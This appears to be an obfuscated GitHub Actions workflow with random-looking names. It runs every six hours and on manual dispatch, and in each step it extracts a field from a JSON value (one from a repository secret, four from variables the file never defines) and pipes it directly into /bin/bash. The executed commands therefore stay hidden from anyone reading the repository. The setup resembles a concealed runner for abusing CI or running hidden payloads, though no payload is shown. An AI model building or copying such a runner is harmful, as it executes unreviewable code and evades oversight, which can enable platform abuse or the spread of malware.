name: absorbedaid
on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: absorbedaid
        env:
          jbl1: ${{ secrets.jbl1 }}
        run: |
          echo $jbl1 | jq -r .is184 | /bin/bash
          echo $tkw73 | jq -r .i050 | /bin/bash
          echo $nd347 | jq -r .p3955 | /bin/bash
          echo $q622 | jq -r .bkgib77 | /bin/bash
          echo $nhws586 | jq -r .snw3324 | /bin/bash

